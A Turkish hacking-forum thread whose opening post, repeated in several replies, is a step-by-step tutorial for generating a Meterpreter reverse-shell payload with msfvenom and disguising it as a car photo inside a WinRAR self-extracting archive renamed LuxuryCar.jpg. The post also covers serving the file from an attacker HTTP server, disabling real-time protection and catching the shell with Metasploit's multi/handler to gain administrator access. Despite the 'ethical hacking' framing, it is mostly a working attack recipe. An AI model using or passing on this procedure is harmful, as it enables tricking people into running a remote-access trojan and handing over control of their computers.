Windows Makinesine Resim İle Sızma Metasploit

giphy.gif


Bu etik bilgisayar korsanlığı projesinde, bir RAT yürütülebilir dosyasını bir görüntünün içinde oluşturma ve gizleme ve bunu bir Windows 10 makinesini hacklemek için kullanma hakkında bir yol gösteriyorum . Güvenli ve kontrollü ortamımda saldırgan olarak Kali Linux VM ve kurban olarak bir Windows 10 VM kullanıyorum.
Uzaktan Erişim Truva Atı (RAT), bir tehdit aktörünün virüs bulaşmış ana bilgisayara erişmesine ve onu kontrol etmesine izin vermek için bir arka kapı uzaktan yönetim kanalı oluşturan kötü amaçlı yazılımdır.
Ayrıca bu proje için WinRAR kullandım .

Bölüm 1

Bir Görsel bulun ve onu PNG veya JPG olarak kaydedin.

İlk olarak, internetten bir resim veya makinenizde kayıtlı bir resim seçin. Ardından, PNG veya JPG olarak kaydedin . Örneğin, lüks bir arabanın resmini kullandım , masaüstüme JPG dosyası olarak kaydettim ve buna Lüks arabam adını verdim . Ardından, WinRAR'ın kurulu olduğundan emin olun .

1*aMc2kpxkDToHFS48JR3EMQ.png


PNG veya JPG resmine sağ tıklayın → Özellikler'e tıklayın → Resmin bir PNG veya JPG dosyası olduğunu onaylayın. Gördüğünüz gibi Lüks arabam bir JPG dosyasıdır . Tamam'ı tıklayın .

1*pq1Xzj4M_kKLSPAPEg6kGg.png


1*zpLft9YOGNxsy8UvWvnC1A.png

Bölüm 2

Görüntüyü bir Simge (ICO) dosyasına dönüştürün.

Dosya türüne bağlı olarak bir PNG veya JPG Simge dönüştürücü kullanacağız. Örneğin, bir JPG dosyası olduğu için Lüks arabam resmi için JPG'den ICO'ya dönüştürücüyü kullanacağız .

1*ZjRi3gS8I3fhfY_8nv2XTQ.png


Dosya Seç → Bilgisayarımdan öğesini tıklayın .

1*Q2g5I-TvIv1OuIEfHC6Y1w.png


Lüks arabam görselini seçin → Aç'a tıklayın .

1*2V1M0cw3ye_HzZinxDSIsA.png


Dönüştür'ü tıklayın .

1*fYLpBGUztp2Xr_zK_diKwA.png


İndir'i tıklayın .

1*GgjbdsfYzsSJOXBejEUOVA.png


İndirilen ICO dosyası sol alt köşede görünür → ICO dosyasını masaüstüne JPG görüntüsünün hemen altına sürükleyip bırakın.
Gördüğünüz gibi, ICO görüntüsü biraz bozuk.

1*7wwf4kFHpUB1O-dAu9GkGA.png

Bölüm 3

Gerçek zamanlı korumayı kapatın.

Devam etmeden önce, yalıtılmış bir ağa geçtim ve gösterim amacıyla, yükün Windows makinesine alınmasıyla ilgili sorunları önlemek için Gerçek zamanlı korumayı kapattım. Bu projenin geri kalanında internet bağlantısı isteğe bağlıdır.

1*Az22pX8jVqfBRGxmbt9ASw.png


4. Bölüm


Yürütülebilir yükü oluşturun ve ayarlayın.

Kali Linux'ta bir Terminal açın ve kök kullanıcı olarak yükü oluşturmak için aşağıdaki komutu yazın:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=10.40.1.110 LPORT=4444 -o ~/payload.exe
1*xAafb7iW7T9isGWGrcXoxw.png

Yük kaydedildikten sonra, cd ~ komutunu kullanarak ana dizine cd yazın ve python3 -m http yazın. sunucu 80, payload.exe dizini ile bağlantı noktası 80'de çalışan web dosya sunucusunu başlatır, böylece kurban makine kötü amaçlı yükü elde edebilir.


cd ~
python3 -m http.sunucu 80

1*IttW19mbvlqXavtLsm4H7A.png

Lüks araba görüntüleri ile Windows kurban makinesinde Microsoft Edge'i açın .
Kali Linux makinesinin IP adresi olan web tarayıcı sekmesine 10.40.1.110 yazın . Enter'a basın .
1*4CQbgfJYXNlOaZ2KnfYtkw.png

Sunucu, istekleri Windows 10 IP adresi olan 10.40.1.111'den alır.
1*yiZYalSWES2VyKvHwXj5Zw.png

HTTP web sunucusu dizinine götürülüyoruz ve en alta doğru kaydırdığınızda msfvenom aracılığıyla oluşturulan payload.exe dosyasını göreceksiniz.
payload.exe'ye tıklayın .

1*oFrRIooYQoqMparIwJdibA.png

1*SgNozluhp_l_Pu_zmsiR6Q.png

Ekranda bir indirme uyarı bildirimi görünmelidir.
Sakla'yı tıklayın .
Payload.exe İndirilenler klasöründe olmalıdır .
1*SUsOA-IsyF9pA0wBI8PRiA.png

1*Ry_Z3BIY7UV0sFT_ghWuQA.png

1*fFIWC868BxwooT8eVJihZQ.png

payload.exe dosyasını masaüstüne sürükleyip bırakın .
1*xc6xUQFjeNxjdRtMzlv-lQ.png

Bölüm 5

RAT'ı Görüntünün içine yerleştirin.

Dosya Gezgini'nde Görünüm sekmesine tıklayın → Dosya adı uzantıları kutusunu işaretleyin . Bu, dosyaların sonunda uzantı türünü gösterecektir.
1*AM5JWdSr1mi-UU4lHZZslw.png

RAT yürütülebilir dosyasını JPG görüntüsünün içine yerleştirmek için payload.exe ve My Luxury car.jpg dosyalarını birlikte vurgulayın ve kutunun içine sağ tıklayın. Ardından Arşive ekle'yi tıklayın .
1*hf1C1JMBfkF3luChOmabXA.png

Genel sekmesinde , Arşiv adı kutusuna RAT dosyasının adını ( LuxuryCar.exe ) yazın . Benzer olmalı ama aynı zamanda diğer dosya adlarından farklı olmalıdır. Bunun bir exe dosyası olduğundan emin olun.


LuxuryCar.exe

Arşiv formatı için ZIP'i kontrol edin → SFX arşivi oluştur kutusunu işaretleyin.
1*Red7GtHnAuokJFiRM10ysw.png

Gelişmiş sekmesini seçin → SFX seçeneklerine tıklayın .
1*e5QVZSzibmlM3dErPTvTZQ.png

Gelişmiş SFX seçeneklerinde , Güncelle sekmesine tıklayın → Dosyaları ayıklayın ve güncelleyin → Tüm dosyaların üzerine yaz'ı işaretleyin .
1*V8ydv8-86HIhbD9O0rqxMw.png

Metin ve simge sekmesine tıklayın → Dosyadan SFX simgesini yüklemek için Gözat'a tıklayın .
1*paW3JLasWo6jS_YAfj5itw.png

My Luxury car.ico dosyasını seçin → Aç'a tıklayın .
1*m2aCZBS4ory6lA94nzlg5Q.png


1*SwEH8ERCioRlibDCDp19qg.png



Modlar sekmesine tıklayın → Tümünü gizle seçeneğine tıklayın .
1*D73IwylciXV1hs0o5ahe3g.png

Ayıklamadan sonra çalıştır kutusuna jpg ve exe resim dosyası adlarını tamamen aynı şekilde yazın .

Lüks arabam.jpg
payload.exe
Tamam'ı tıklayın .
1*N50eyptPf_81olAN4paeQw.png

Tekrar Tamam'ı tıklayın .
1*k-eAvn5vZgJ4thCLrTVIlQ.png

Şimdi, RAT görüntü dosyası LuxuryCar.exe masaüstünde görünür. Bu, bir RAT'ın bir görüntünün içine nasıl yerleştirildiğidir.
1*vag1d-7gLxbjIJ9tma3WSQ.png



6. Bölüm


Metasploit'i kurun.

Bunun işe yaradığını doğrulamak için, sızma testi çerçevesi için çok popüler bir etik hackleme aracı olan Metasploit'i kullanacağız . Bu araç, güvenlik açıklarını, belirlenen açıkları kontrol etmemizi ve eksiksiz bir güvenlik değerlendirmesi yapmamızı sağlar.
Metasploit'i başlatmak için msfconsole komutunu yazın .
1*GxsvCd-igGF-13x-DydCqg.png

msfconsole yüklendikten sonra şunu yazın:


exploit/multi/handler kullan
1*FeWekpo80Js4xbm9hpzxUw.png

Ardından şunu yazın:

yük pencerelerini
/meterpreter/reverse_tcp'yi ayarla
1*od6YOdO2XblsjRu4-aX0JQ.png

Ardından şunu yazın:

seçenekleri göster
1*esPF0STJiUsHzF2uDgaT7g.png

Ana bilgisayar IP adresini (Kali Linux VM) , 10.40.1.110, LHOST'a atamalıyız .
Aşağıdaki komutları yazın:


LHOST 10.40.1.110'u ayarla
seçenekleri göster
1*ORZMtjYXgOBmrATPUmY3iw.png

1*m4jsg0tz1Chp4mczmiQRjw.png

Şimdi LHOST'un
10.40.1.110 IP adresine ayarlandığını görebiliriz.
1*E4c4KJo64K8yFS0KPxvHMQ.png

İstismar etmeye hazırız, bu yüzden sadece exploit yazmanız yeterli . → Enter tuşuna basın .
1*jIJE1ol3SR5KAiCw_x6n6g.png

Sunucu şimdi dinliyor.
1*xtnMG1YxI6V0bFv-mFHmwQ.png

7. Bölüm

RAT'ı görüntünün içinde yürütün.

Windows 10'a geri dönün , Dosya Gezgini'ni açın → Görüntüle'yi tıklayın → Dosya adı uzantılarının işaretini kaldırın .
1*bsymeHyiwtfNMFOii5qEiw.png

Dosya adı uzantıları işaretlenmemişken dosya türlerini artık göremezsiniz . Bu nedenle RAT'ı biraz farklı adlandırdık.
1*KnC2rmTtDoRG0hZkhk0Hcw.png

1*I1eTQECneEVakhJwkG5icg.png


Gizlenmiş dosya türleri ile, LuxuryCar olan RAT exe görüntüsünün adını LuxuryCar.jpg olarak değiştirebiliriz . Şimdi, normal bir jpg dosyası gibi görünüyor, ama aslında bir exe dosyası.
1*9wPn2WPJkyz2pF6GYQTTjQ.png
1*PXf-Vb2toLa61mxeHy0GxQ.png

LuxuryCar.jpg RAT resmine tıklıyoruz ve hiçbir şey olmuyor gibi görünüyor.
1*bZbRMCThVGKGgyIfe_UZOA.png

Komut İstemi'ni açın ve ipconfig yazın. Windows 10 IP adresi 10.40.1.111'dir .
1*QjSe7aUuMZuD3KSJa3cG_w.png

Kali Linux'ta Metasploit Çerçevesine geri dönersek , bir şeylerin olduğunu görebiliriz ve şimdi Kali IP adresi 10.40.110'dan Windows IP adresi 10.40.1.111'e açık bir Meterpreter oturumumuz var .
1*lmm1TpvpnPXRiGPXU8l22A.png

ipconfig yazın ve Windows 10 IP adresini görebiliriz. 10.40.1.111.
1*EQ9iy6rdIQ9BwjOpX5oHTg.png

Shell → Enter → whoami yazın .
Windows 10 makinesinin yöneticisiyim .
1*Z39Y9K-eVLvqZfqZJr5m4A.png


Sonuç olarak, bir RAT bir görüntünün içine bu şekilde gizlenir ve bir Windows sistemini hacklemek için kullanılır. Bu basit ve bilgilendirici bir süreçtir.


Kaynak:Cybertech Maven
 

Muslukcu

Katılımcı Üye
17 Kas 2021
699
264
Tesisat dükkanı
giphy.gif


Bu etik bilgisayar korsanlığı projesinde, bir RAT yürütülebilir dosyasını bir görüntünün içinde oluşturma ve gizleme ve bunu bir Windows 10 makinesini hacklemek için kullanma hakkında bir yol gösteriyorum . Güvenli ve kontrollü ortamımda saldırgan olarak Kali Linux VM ve kurban olarak bir Windows 10 VM kullanıyorum.
Uzaktan Erişim Truva Atı (RAT), bir tehdit aktörünün virüs bulaşmış ana bilgisayara erişmesine ve onu kontrol etmesine izin vermek için bir arka kapı uzaktan yönetim kanalı oluşturan kötü amaçlı yazılımdır.
Ayrıca bu proje için WinRAR kullandım .

Bölüm 1

Bir Görsel bulun ve onu PNG veya JPG olarak kaydedin.

İlk olarak, internetten bir resim veya makinenizde kayıtlı bir resim seçin. Ardından, PNG veya JPG olarak kaydedin . Örneğin, lüks bir arabanın resmini kullandım , masaüstüme JPG dosyası olarak kaydettim ve buna Lüks arabam adını verdim . Ardından, WinRAR'ın kurulu olduğundan emin olun .

1*aMc2kpxkDToHFS48JR3EMQ.png


PNG veya JPG resmine sağ tıklayın → Özellikler'e tıklayın → Resmin bir PNG veya JPG dosyası olduğunu onaylayın. Gördüğünüz gibi Lüks arabam bir JPG dosyasıdır . Tamam'ı tıklayın .

1*pq1Xzj4M_kKLSPAPEg6kGg.png


1*zpLft9YOGNxsy8UvWvnC1A.png

Bölüm 2

Görüntüyü bir Simge (ICO) dosyasına dönüştürün.

Dosya türüne bağlı olarak bir PNG veya JPG Simge dönüştürücü kullanacağız. Örneğin, bir JPG dosyası olduğu için Lüks arabam resmi için JPG'den ICO'ya dönüştürücüyü kullanacağız .

1*ZjRi3gS8I3fhfY_8nv2XTQ.png


Dosya Seç → Bilgisayarımdan öğesini tıklayın .

1*Q2g5I-TvIv1OuIEfHC6Y1w.png


Lüks arabam görselini seçin → Aç'a tıklayın .

1*2V1M0cw3ye_HzZinxDSIsA.png


Dönüştür'ü tıklayın .

1*fYLpBGUztp2Xr_zK_diKwA.png


İndir'i tıklayın .

1*GgjbdsfYzsSJOXBejEUOVA.png


İndirilen ICO dosyası sol alt köşede görünür → ICO dosyasını masaüstüne JPG görüntüsünün hemen altına sürükleyip bırakın.
Gördüğünüz gibi, ICO görüntüsü biraz bozuk.

1*7wwf4kFHpUB1O-dAu9GkGA.png

Bölüm 3

Gerçek zamanlı korumayı kapatın.

Devam etmeden önce, yalıtılmış bir ağa geçtim ve gösterim amacıyla, yükün Windows makinesine alınmasıyla ilgili sorunları önlemek için Gerçek zamanlı korumayı kapattım. Bu projenin geri kalanında internet bağlantısı isteğe bağlıdır.

1*Az22pX8jVqfBRGxmbt9ASw.png


4. Bölüm


Yürütülebilir yükü oluşturun ve ayarlayın.

Kali Linux'ta bir Terminal açın ve kök kullanıcı olarak yükü oluşturmak için aşağıdaki komutu yazın:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=10.40.1.110 LPORT=4444 -o ~/payload.exe
1*xAafb7iW7T9isGWGrcXoxw.png

Yük kaydedildikten sonra, cd ~ komutunu kullanarak ana dizine cd yazın ve python3 -m http yazın. sunucu 80, payload.exe dizini ile bağlantı noktası 80'de çalışan web dosya sunucusunu başlatır, böylece kurban makine kötü amaçlı yükü elde edebilir.


cd ~
python3 -m http.sunucu 80

1*IttW19mbvlqXavtLsm4H7A.png

Lüks araba görüntüleri ile Windows kurban makinesinde Microsoft Edge'i açın .
Kali Linux makinesinin IP adresi olan web tarayıcı sekmesine 10.40.1.110 yazın . Enter'a basın .
1*4CQbgfJYXNlOaZ2KnfYtkw.png

Sunucu, istekleri Windows 10 IP adresi olan 10.40.1.111'den alır.
1*yiZYalSWES2VyKvHwXj5Zw.png

HTTP web sunucusu dizinine götürülüyoruz ve en alta doğru kaydırdığınızda msfvenom aracılığıyla oluşturulan payload.exe dosyasını göreceksiniz.
payload.exe'ye tıklayın .

1*oFrRIooYQoqMparIwJdibA.png

1*SgNozluhp_l_Pu_zmsiR6Q.png

Ekranda bir indirme uyarı bildirimi görünmelidir.
Sakla'yı tıklayın .
Payload.exe İndirilenler klasöründe olmalıdır .
1*SUsOA-IsyF9pA0wBI8PRiA.png

1*Ry_Z3BIY7UV0sFT_ghWuQA.png

1*fFIWC868BxwooT8eVJihZQ.png

payload.exe dosyasını masaüstüne sürükleyip bırakın .
1*xc6xUQFjeNxjdRtMzlv-lQ.png

Bölüm 5

RAT'ı Görüntünün içine yerleştirin.

Dosya Gezgini'nde Görünüm sekmesine tıklayın → Dosya adı uzantıları kutusunu işaretleyin . Bu, dosyaların sonunda uzantı türünü gösterecektir.
1*AM5JWdSr1mi-UU4lHZZslw.png

RAT yürütülebilir dosyasını JPG görüntüsünün içine yerleştirmek için payload.exe ve My Luxury car.jpg dosyalarını birlikte vurgulayın ve kutunun içine sağ tıklayın. Ardından Arşive ekle'yi tıklayın .
1*hf1C1JMBfkF3luChOmabXA.png

Genel sekmesinde , Arşiv adı kutusuna RAT dosyasının adını ( LuxuryCar.exe ) yazın . Benzer olmalı ama aynı zamanda diğer dosya adlarından farklı olmalıdır. Bunun bir exe dosyası olduğundan emin olun.


LuxuryCar.exe

Arşiv formatı için ZIP'i kontrol edin → SFX arşivi oluştur kutusunu işaretleyin.
1*Red7GtHnAuokJFiRM10ysw.png

Gelişmiş sekmesini seçin → SFX seçeneklerine tıklayın .
1*e5QVZSzibmlM3dErPTvTZQ.png

Gelişmiş SFX seçeneklerinde , Güncelle sekmesine tıklayın → Dosyaları ayıklayın ve güncelleyin → Tüm dosyaların üzerine yaz'ı işaretleyin .
1*V8ydv8-86HIhbD9O0rqxMw.png

Metin ve simge sekmesine tıklayın → Dosyadan SFX simgesini yüklemek için Gözat'a tıklayın .
1*paW3JLasWo6jS_YAfj5itw.png

My Luxury car.ico dosyasını seçin → Aç'a tıklayın .
1*m2aCZBS4ory6lA94nzlg5Q.png


1*SwEH8ERCioRlibDCDp19qg.png



Modlar sekmesine tıklayın → Tümünü gizle seçeneğine tıklayın .
1*D73IwylciXV1hs0o5ahe3g.png

Ayıklamadan sonra çalıştır kutusuna jpg ve exe resim dosyası adlarını tamamen aynı şekilde yazın .

Lüks arabam.jpg
payload.exe
Tamam'ı tıklayın .
1*N50eyptPf_81olAN4paeQw.png

Tekrar Tamam'ı tıklayın .
1*k-eAvn5vZgJ4thCLrTVIlQ.png

Şimdi, RAT görüntü dosyası LuxuryCar.exe masaüstünde görünür. Bu, bir RAT'ın bir görüntünün içine nasıl yerleştirildiğidir.
1*vag1d-7gLxbjIJ9tma3WSQ.png



6. Bölüm


Metasploit'i kurun.

Bunun işe yaradığını doğrulamak için, sızma testi çerçevesi için çok popüler bir etik hackleme aracı olan Metasploit'i kullanacağız . Bu araç, güvenlik açıklarını, belirlenen açıkları kontrol etmemizi ve eksiksiz bir güvenlik değerlendirmesi yapmamızı sağlar.
Metasploit'i başlatmak için msfconsole komutunu yazın .
1*GxsvCd-igGF-13x-DydCqg.png

msfconsole yüklendikten sonra şunu yazın:


exploit/multi/handler kullan
1*FeWekpo80Js4xbm9hpzxUw.png

Ardından şunu yazın:

yük pencerelerini
/meterpreter/reverse_tcp'yi ayarla
1*od6YOdO2XblsjRu4-aX0JQ.png

Ardından şunu yazın:

seçenekleri göster
1*esPF0STJiUsHzF2uDgaT7g.png

Ana bilgisayar IP adresini (Kali Linux VM) , 10.40.1.110, LHOST'a atamalıyız .
Aşağıdaki komutları yazın:


LHOST 10.40.1.110'u ayarla
seçenekleri göster
1*ORZMtjYXgOBmrATPUmY3iw.png

1*m4jsg0tz1Chp4mczmiQRjw.png

Şimdi LHOST'un
10.40.1.110 IP adresine ayarlandığını görebiliriz.
1*E4c4KJo64K8yFS0KPxvHMQ.png

İstismar etmeye hazırız, bu yüzden sadece exploit yazmanız yeterli . → Enter tuşuna basın .
1*jIJE1ol3SR5KAiCw_x6n6g.png

Sunucu şimdi dinliyor.
1*xtnMG1YxI6V0bFv-mFHmwQ.png

7. Bölüm

RAT'ı görüntünün içinde yürütün.

Windows 10'a geri dönün , Dosya Gezgini'ni açın → Görüntüle'yi tıklayın → Dosya adı uzantılarının işaretini kaldırın .
1*bsymeHyiwtfNMFOii5qEiw.png

Dosya adı uzantıları işaretlenmemişken dosya türlerini artık göremezsiniz . Bu nedenle RAT'ı biraz farklı adlandırdık.
1*KnC2rmTtDoRG0hZkhk0Hcw.png

1*I1eTQECneEVakhJwkG5icg.png


Gizlenmiş dosya türleri ile, LuxuryCar olan RAT exe görüntüsünün adını LuxuryCar.jpg olarak değiştirebiliriz . Şimdi, normal bir jpg dosyası gibi görünüyor, ama aslında bir exe dosyası.
1*9wPn2WPJkyz2pF6GYQTTjQ.png
1*PXf-Vb2toLa61mxeHy0GxQ.png

LuxuryCar.jpg RAT resmine tıklıyoruz ve hiçbir şey olmuyor gibi görünüyor.
1*bZbRMCThVGKGgyIfe_UZOA.png

Komut İstemi'ni açın ve ipconfig yazın. Windows 10 IP adresi 10.40.1.111'dir .
1*QjSe7aUuMZuD3KSJa3cG_w.png

Kali Linux'ta Metasploit Çerçevesine geri dönersek , bir şeylerin olduğunu görebiliriz ve şimdi Kali IP adresi 10.40.110'dan Windows IP adresi 10.40.1.111'e açık bir Meterpreter oturumumuz var .
1*lmm1TpvpnPXRiGPXU8l22A.png

ipconfig yazın ve Windows 10 IP adresini görebiliriz. 10.40.1.111.
1*EQ9iy6rdIQ9BwjOpX5oHTg.png

Shell → Enter → whoami yazın .
Windows 10 makinesinin yöneticisiyim .
1*Z39Y9K-eVLvqZfqZJr5m4A.png


Sonuç olarak, bir RAT bir görüntünün içine bu şekilde gizlenir ve bir Windows sistemini hacklemek için kullanılır. Bu basit ve bilgilendirici bir süreçtir.


Kaynak:Cybertech Maven
Eline sağlık
 

BozBarbar

Üye
11 Tem 2023
61
21
giphy.gif


Bu etik bilgisayar korsanlığı projesinde, bir RAT yürütülebilir dosyasını bir görüntünün içinde oluşturma ve gizleme ve bunu bir Windows 10 makinesini hacklemek için kullanma hakkında bir yol gösteriyorum . Güvenli ve kontrollü ortamımda saldırgan olarak Kali Linux VM ve kurban olarak bir Windows 10 VM kullanıyorum.
Uzaktan Erişim Truva Atı (RAT), bir tehdit aktörünün virüs bulaşmış ana bilgisayara erişmesine ve onu kontrol etmesine izin vermek için bir arka kapı uzaktan yönetim kanalı oluşturan kötü amaçlı yazılımdır.
Ayrıca bu proje için WinRAR kullandım .

Bölüm 1

Bir Görsel bulun ve onu PNG veya JPG olarak kaydedin.

İlk olarak, internetten bir resim veya makinenizde kayıtlı bir resim seçin. Ardından, PNG veya JPG olarak kaydedin . Örneğin, lüks bir arabanın resmini kullandım , masaüstüme JPG dosyası olarak kaydettim ve buna Lüks arabam adını verdim . Ardından, WinRAR'ın kurulu olduğundan emin olun .

1*aMc2kpxkDToHFS48JR3EMQ.png


PNG veya JPG resmine sağ tıklayın → Özellikler'e tıklayın → Resmin bir PNG veya JPG dosyası olduğunu onaylayın. Gördüğünüz gibi Lüks arabam bir JPG dosyasıdır . Tamam'ı tıklayın .

1*pq1Xzj4M_kKLSPAPEg6kGg.png


1*zpLft9YOGNxsy8UvWvnC1A.png

Bölüm 2

Görüntüyü bir Simge (ICO) dosyasına dönüştürün.

Dosya türüne bağlı olarak bir PNG veya JPG Simge dönüştürücü kullanacağız. Örneğin, bir JPG dosyası olduğu için Lüks arabam resmi için JPG'den ICO'ya dönüştürücüyü kullanacağız .

1*ZjRi3gS8I3fhfY_8nv2XTQ.png


Dosya Seç → Bilgisayarımdan öğesini tıklayın .

1*Q2g5I-TvIv1OuIEfHC6Y1w.png


Lüks arabam görselini seçin → Aç'a tıklayın .

1*2V1M0cw3ye_HzZinxDSIsA.png


Dönüştür'ü tıklayın .

1*fYLpBGUztp2Xr_zK_diKwA.png


İndir'i tıklayın .

1*GgjbdsfYzsSJOXBejEUOVA.png


İndirilen ICO dosyası sol alt köşede görünür → ICO dosyasını masaüstüne JPG görüntüsünün hemen altına sürükleyip bırakın.
Gördüğünüz gibi, ICO görüntüsü biraz bozuk.

1*7wwf4kFHpUB1O-dAu9GkGA.png

Bölüm 3

Gerçek zamanlı korumayı kapatın.

Devam etmeden önce, yalıtılmış bir ağa geçtim ve gösterim amacıyla, yükün Windows makinesine alınmasıyla ilgili sorunları önlemek için Gerçek zamanlı korumayı kapattım. Bu projenin geri kalanında internet bağlantısı isteğe bağlıdır.

1*Az22pX8jVqfBRGxmbt9ASw.png


4. Bölüm


Yürütülebilir yükü oluşturun ve ayarlayın.

Kali Linux'ta bir Terminal açın ve kök kullanıcı olarak yükü oluşturmak için aşağıdaki komutu yazın:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=10.40.1.110 LPORT=4444 -o ~/payload.exe
1*xAafb7iW7T9isGWGrcXoxw.png

Yük kaydedildikten sonra, cd ~ komutunu kullanarak ana dizine cd yazın ve python3 -m http yazın. sunucu 80, payload.exe dizini ile bağlantı noktası 80'de çalışan web dosya sunucusunu başlatır, böylece kurban makine kötü amaçlı yükü elde edebilir.


cd ~
python3 -m http.sunucu 80

1*IttW19mbvlqXavtLsm4H7A.png

Lüks araba görüntüleri ile Windows kurban makinesinde Microsoft Edge'i açın .
Kali Linux makinesinin IP adresi olan web tarayıcı sekmesine 10.40.1.110 yazın . Enter'a basın .
1*4CQbgfJYXNlOaZ2KnfYtkw.png

Sunucu, istekleri Windows 10 IP adresi olan 10.40.1.111'den alır.
1*yiZYalSWES2VyKvHwXj5Zw.png

HTTP web sunucusu dizinine götürülüyoruz ve en alta doğru kaydırdığınızda msfvenom aracılığıyla oluşturulan payload.exe dosyasını göreceksiniz.
payload.exe'ye tıklayın .

1*oFrRIooYQoqMparIwJdibA.png

1*SgNozluhp_l_Pu_zmsiR6Q.png

Ekranda bir indirme uyarı bildirimi görünmelidir.
Sakla'yı tıklayın .
Payload.exe İndirilenler klasöründe olmalıdır .
1*SUsOA-IsyF9pA0wBI8PRiA.png

1*Ry_Z3BIY7UV0sFT_ghWuQA.png

1*fFIWC868BxwooT8eVJihZQ.png

payload.exe dosyasını masaüstüne sürükleyip bırakın .
1*xc6xUQFjeNxjdRtMzlv-lQ.png

Bölüm 5

RAT'ı Görüntünün içine yerleştirin.

Dosya Gezgini'nde Görünüm sekmesine tıklayın → Dosya adı uzantıları kutusunu işaretleyin . Bu, dosyaların sonunda uzantı türünü gösterecektir.
1*AM5JWdSr1mi-UU4lHZZslw.png

RAT yürütülebilir dosyasını JPG görüntüsünün içine yerleştirmek için payload.exe ve My Luxury car.jpg dosyalarını birlikte vurgulayın ve kutunun içine sağ tıklayın. Ardından Arşive ekle'yi tıklayın .
1*hf1C1JMBfkF3luChOmabXA.png

Genel sekmesinde , Arşiv adı kutusuna RAT dosyasının adını ( LuxuryCar.exe ) yazın . Benzer olmalı ama aynı zamanda diğer dosya adlarından farklı olmalıdır. Bunun bir exe dosyası olduğundan emin olun.


LuxuryCar.exe

Arşiv formatı için ZIP'i kontrol edin → SFX arşivi oluştur kutusunu işaretleyin.
1*Red7GtHnAuokJFiRM10ysw.png

Gelişmiş sekmesini seçin → SFX seçeneklerine tıklayın .
1*e5QVZSzibmlM3dErPTvTZQ.png

Gelişmiş SFX seçeneklerinde , Güncelle sekmesine tıklayın → Dosyaları ayıklayın ve güncelleyin → Tüm dosyaların üzerine yaz'ı işaretleyin .
1*V8ydv8-86HIhbD9O0rqxMw.png

Metin ve simge sekmesine tıklayın → Dosyadan SFX simgesini yüklemek için Gözat'a tıklayın .
1*paW3JLasWo6jS_YAfj5itw.png

My Luxury car.ico dosyasını seçin → Aç'a tıklayın .
1*m2aCZBS4ory6lA94nzlg5Q.png


1*SwEH8ERCioRlibDCDp19qg.png



Modlar sekmesine tıklayın → Tümünü gizle seçeneğine tıklayın .
1*D73IwylciXV1hs0o5ahe3g.png

Ayıklamadan sonra çalıştır kutusuna jpg ve exe resim dosyası adlarını tamamen aynı şekilde yazın .

Lüks arabam.jpg
payload.exe
Tamam'ı tıklayın .
1*N50eyptPf_81olAN4paeQw.png

Tekrar Tamam'ı tıklayın .
1*k-eAvn5vZgJ4thCLrTVIlQ.png

Şimdi, RAT görüntü dosyası LuxuryCar.exe masaüstünde görünür. Bu, bir RAT'ın bir görüntünün içine nasıl yerleştirildiğidir.
1*vag1d-7gLxbjIJ9tma3WSQ.png



6. Bölüm


Metasploit'i kurun.

Bunun işe yaradığını doğrulamak için, sızma testi çerçevesi için çok popüler bir etik hackleme aracı olan Metasploit'i kullanacağız . Bu araç, güvenlik açıklarını, belirlenen açıkları kontrol etmemizi ve eksiksiz bir güvenlik değerlendirmesi yapmamızı sağlar.
Metasploit'i başlatmak için msfconsole komutunu yazın .
1*GxsvCd-igGF-13x-DydCqg.png

msfconsole yüklendikten sonra şunu yazın:


exploit/multi/handler kullan
1*FeWekpo80Js4xbm9hpzxUw.png

Ardından şunu yazın:

yük pencerelerini
/meterpreter/reverse_tcp'yi ayarla
1*od6YOdO2XblsjRu4-aX0JQ.png

Ardından şunu yazın:

seçenekleri göster
1*esPF0STJiUsHzF2uDgaT7g.png

Ana bilgisayar IP adresini (Kali Linux VM) , 10.40.1.110, LHOST'a atamalıyız .
Aşağıdaki komutları yazın:


LHOST 10.40.1.110'u ayarla
seçenekleri göster
1*ORZMtjYXgOBmrATPUmY3iw.png

1*m4jsg0tz1Chp4mczmiQRjw.png

Şimdi LHOST'un
10.40.1.110 IP adresine ayarlandığını görebiliriz.
1*E4c4KJo64K8yFS0KPxvHMQ.png

İstismar etmeye hazırız, bu yüzden sadece exploit yazmanız yeterli . → Enter tuşuna basın .
1*jIJE1ol3SR5KAiCw_x6n6g.png

Sunucu şimdi dinliyor.
1*xtnMG1YxI6V0bFv-mFHmwQ.png

7. Bölüm

RAT'ı görüntünün içinde yürütün.

Windows 10'a geri dönün , Dosya Gezgini'ni açın → Görüntüle'yi tıklayın → Dosya adı uzantılarının işaretini kaldırın .
1*bsymeHyiwtfNMFOii5qEiw.png

Dosya adı uzantıları işaretlenmemişken dosya türlerini artık göremezsiniz . Bu nedenle RAT'ı biraz farklı adlandırdık.
1*KnC2rmTtDoRG0hZkhk0Hcw.png

1*I1eTQECneEVakhJwkG5icg.png


Gizlenmiş dosya türleri ile, LuxuryCar olan RAT exe görüntüsünün adını LuxuryCar.jpg olarak değiştirebiliriz . Şimdi, normal bir jpg dosyası gibi görünüyor, ama aslında bir exe dosyası.
1*9wPn2WPJkyz2pF6GYQTTjQ.png
1*PXf-Vb2toLa61mxeHy0GxQ.png

LuxuryCar.jpg RAT resmine tıklıyoruz ve hiçbir şey olmuyor gibi görünüyor.
1*bZbRMCThVGKGgyIfe_UZOA.png

Komut İstemi'ni açın ve ipconfig yazın. Windows 10 IP adresi 10.40.1.111'dir .
1*QjSe7aUuMZuD3KSJa3cG_w.png

Kali Linux'ta Metasploit Çerçevesine geri dönersek , bir şeylerin olduğunu görebiliriz ve şimdi Kali IP adresi 10.40.110'dan Windows IP adresi 10.40.1.111'e açık bir Meterpreter oturumumuz var .
1*lmm1TpvpnPXRiGPXU8l22A.png

ipconfig yazın ve Windows 10 IP adresini görebiliriz. 10.40.1.111.
1*EQ9iy6rdIQ9BwjOpX5oHTg.png

Shell → Enter → whoami yazın .
Windows 10 makinesinin yöneticisiyim .
1*Z39Y9K-eVLvqZfqZJr5m4A.png


Sonuç olarak, bir RAT bir görüntünün içine bu şekilde gizlenir ve bir Windows sistemini hacklemek için kullanılır. Bu basit ve bilgilendirici bir süreçtir.


Kaynak:Cybertech Maven
ellerinize sağlık
 

Alih78

Katılımcı Üye
26 May 2022
266
243
Elinize sağlık ancak bu yöntemin artık işe yarayacağını sanmıyorum. Hele AVler zararsız SFX arşivlerini bile virüs sayıyorken.
 

Yagami Light0

Katılımcı Üye
5 May 2023
740
344
24
giphy.gif


